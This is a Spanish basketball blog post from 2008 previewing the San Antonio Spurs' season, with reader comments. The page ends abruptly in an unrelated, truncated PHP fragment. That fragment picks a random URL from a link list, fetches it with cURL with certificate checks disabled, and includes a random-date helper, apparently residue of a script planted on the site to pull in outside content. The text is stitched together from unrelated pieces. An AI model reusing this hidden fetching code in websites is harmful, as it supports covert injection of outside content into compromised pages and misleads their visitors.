San Antonio Spurs: Últimas etapas de un viaje inolvidable

22 de October de 2008 por MagicJohnson32

spurscinco

“A Itaca debes el maravilloso viaje. Sin ella no habrías emprendido el camino y ahora nada tiene que ofrecerte. Si pobre la encuentras, Itaca no te engañó. Hoy que eres sabio, y en experiencias rico, comprendes qué significan las Itacas”. El largo viaje que los Spurs emprendieron en el 98 con la llegada de Tim Duncan a la liga se aproxima a su destino. Y como acostumbra a suceder, éste no será tan agradable como lo fue el trayecto y todas aquellas experiencias acumuladas durante el mismo. En el caso de los Spurs: 4 Anillos de campeones, además de dos Finales de Conferencia y muchos éxitos colectivos e individuales.

La plantilla de Popovich es una foto en sepia: todos sus hombres importantes, salvo Tony Parker, están por encima de la treintena. Un año más, y por tanto un año más viejos, el granítico bloque de los texanos se presenta sin grandes novedades y con las mismas aspiraciones, que no son otras que luchar por el Anillo. Motivos para el optimismo los hay: Los cuatro jugadores que componen el núcleo duro de los Spurs -Duncan, Ginóbili, Parker y Bowen– llevan juntos desde 2002, un hecho casi único en la liga y al que sólo los Pistons se aproximan (Rasheed llegó a Detroit en 2003); además, Tim Duncan sigue siendo uno de los mejores y más determinantes jugadores del mundo; y toca año impar, y ya saben lo que sucedió las tres últimas ocasiones en que se dio tal circunstancia. Motivos para el pesimismo hay varios, pero fundamentalmente uno: Ginóbili, que terminó la temporada con una lamentable serie ante los Lakers, se lesionó el tobillo izquierdo en los Juegos Olímpicos y no regresará hasta mediados de diciembre, como mínimo. Precisamente aquella eliminatoria contra el equipo angelino nos dejó con la sensación de que a los Spurs ya no les valía con su tradicional estrategia de juego árido pero innegable efectividad. El barbecho ya no es suficiente.

manulesionadoNo, no estamos descartándolos, porque han demostrado año tras año lo imprudente que resulta darlos por finiquitados. Volvieron a demostrarlo en los pasados Playoffs, en la victoria en el partido inicial de la primera ronda ante lo Suns gracias al único triple de Duncan en toda la temporada, o en el triunfo en el séptimo encuentro, con factor cancha en contra, en la eliminatoria contra los Hornets.  Pero en las derrotas de los partidos 1º y 5º de las pasadas Finales de Conferencia, con sendas remontadas de los Lakers de 20 y 17 puntos respectivamente, vimos a unos Spurs que capitulaban de mala manera, antes de tiempo, de una forma impropia para lo que este equipo ha sido y representa.

Ha pasado el verano, que Duncan y Parker han dedicado a descansar, Ginóbili a lesionarse, Popovich a dejarse barba, y la franquicia a tratar de rejuvenecer la plantilla sin renunciar a su filosofía. Han llegado Roger Mason (ex Wizards) y Salim Stoudemire (ex Hawks), que habrán de asumir la pesada responsabilidad de suplir la marcha de Brent Barry a Houston y la comentada ausencia de Ginóbili. No hay que esperar, sin embargo, contribuciones decisivas por parte de ninguno de los dos, y menos aún por parte de los más jóvenes, el ala-pívot francés Mahinmi y el base rookie George Hill. Así, serán Finley y sobre todo Parker los que incrementarán sus prestaciones hasta el regreso del argentino. Es probable que veamos al base francés en el All-Star Game, dado que su cifra anotadora y su responsabilidad serán mucho mayores, pero los Spurs echarán en falta a Ginóbili. Los optimistas dirán que el zurdo de Bahía Blanca llegará en mejores condiciones a los Playoffs, aunque no acabo de ver a Popovich como socio del Club del Vaso Medio Lleno.

popoinstruccionesJunto a Parker y Finley estará de nuevo, indiscutible en el quinteto, perro de presa oficial de los Spurs, Bruce Bowen. Con 37 años volverá a ofrecer pobres estadísticas, trabajo incansable y dureza al límite. Los minutos de descanso para Bowen serán para Udoka, mejor ofensivamente y más que correcto en defensa.

Si en el perímetro habrá pocas novedades, en la pintura apenas habrá ninguna. Duncan será de nuevo el epicentro del juego y el pilar defensivo. A su lado, de inicio, estará Oberto, quien se ha readaptado bien al rol que Popovich le ha exigido aunque podría intercambiar papeles con Kurt Thomas como primer recambio desde el banco. Matt Bonner completará las principales rotaciones.

No existen, como ven, razones para prever que San Antonio Spurs nos ofrezcan nada diferente a lo que nos ha venido ofreciendo en su historia reciente, una historia jalonada por éxitos y que, en la temporada 2008-2009, vivirá uno de sus últimos episodios. Será una de las últimas etapas de un largo y cansado viaje, y no parece que los Spurs la afronten en las mejores condiciones. Y, pese a que no seré yo quien los dé por muertos, déjenme que les reconozca una cosa: jamás me creí aquello de los años pares y los años impares.

Quinteto inicial: Tony Parker, Michael Finley, Bruce Bowen, Tim Duncan y Fabricio Oberto.

Sexto hombre: Manu Ginóbili.

Pronóstico: Semifinales de Conferencia.

Comenta

11 comentarios a esta entrada

  1. TheDeerHunter dice:
    #1

    No te perdono que no hayas hecho siquiera mención del gran Robert Horry…

      Citar

  2. MagicJohnson32 dice:
    #2

    Desde que dijo que si Popovich hubiese tenido las plantillas de Phil Jackson habría ganado más anillos que él, reniego de Robert Horry. Además, ya no pertenece a los Spurs.

      Citar

  3. Hynreck dice:
    #3

    Duncan, el mejor PF de la historia? Pues aunque no me llame nada la atención su juego probablemente si.

      Citar

  4. Viva_Dirk dice:
    #4

    Tiene toda la pinta de que van a agotar el proyecto hasta el máximo con la esperanza de luchar otro anillo, cosa que me parece un gran error. Veo lógico que dejen a Duncan retirarse allí, de hecho me parece que es lo menos que deben hacer, pero deberian buscar algo con Ginobili, que a muchos equipos les vendrian de perlas(por ejemplo, Utah u Orlando), y sacar a cambio algo de juventud o algo de presente pero que les de libertad salarial en no mucho tiempo.

    Respecto a lo que dice Hynreck, para mi si es el mejor PF de la historia.

      Citar

  5. Jabho dice:
    #5

    Duncan es de los grandes, grandes. Desde mi recuerdo de los 80 desde luego el mejor PF.

    Completamente de acuerdo con Magic. Por casi primera vez, en otros años pares tuvieron circunstancias atenuantes, los Spurs parecieron claramente inferiores a Lakers y si me apuras a Hornets. El viaje se acaba, pero yo tampoco les entierro.

    Creo que por primera vez veo a priori equipos mejores. Pero deberán demostrarlo. Ellos darán su nivel y el que quiera ganarles que lo haga muy bien.

    Me mojo. En mi quiniela pierden la final ante los Cavs.

      Citar

  6. TheDeerHunter dice:
    #6

    Mare meua…
    pronosticazo de Jabho… sobre todo para ver a priori equipos mejores.

    Por cierto Magic… muy bonito el artículo. A partir de ahora para mí eres sospechoso de ser aficionado de los Spurs infiltrado.
    Espero que te resarzas en el de LA.

      Citar

  7. MagicJohnson32 dice:
    #7

    Hombre, Deer, los habría llamado ‘abuelos acabaos’, y que su viaje, en lugar de a Itaca, fuese en el autobús del Inserso y a Torrevieja. Pero no es mi estilo, jaja.

      Citar

  8. TheDeerHunter dice:
    #8

    Es que ni siquiera has hablado de cómo secó Bowen a Kobe en el último enfrentamiento… (el sudor, me refiero)

      Citar

  9. MagicJohnson32 dice:
    #9

    Bueno, pues tendré que redimirme en el análisis de LAL… Que yo creo que sí.

      Citar

  10. MagicJohnson32 dice:
    #10

    Popo ya se ha cargado a Stoudemire. El tío se ha esperado a que publicase el análisis para cortarlo, qué mala gente.

      Citar

  11. Gallis dice:
    #11

    Puestos a ponerles un pero a este equipo, el único fallo que le veo es que no consiguieran ganar 2 anillos seguidos…pero vaya, pecata minuta. Yo creo que hazañas como las del último Playoff cada vez son más dificiles. Estarán hasta el final, darán mucha guerra y más de un susto, pero se tiene que dar todo muy bien en SA y todo bastante mal en 2 ó 3 equipos para que se vuelvan a plantar en una final, por muy año impar que sea…

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>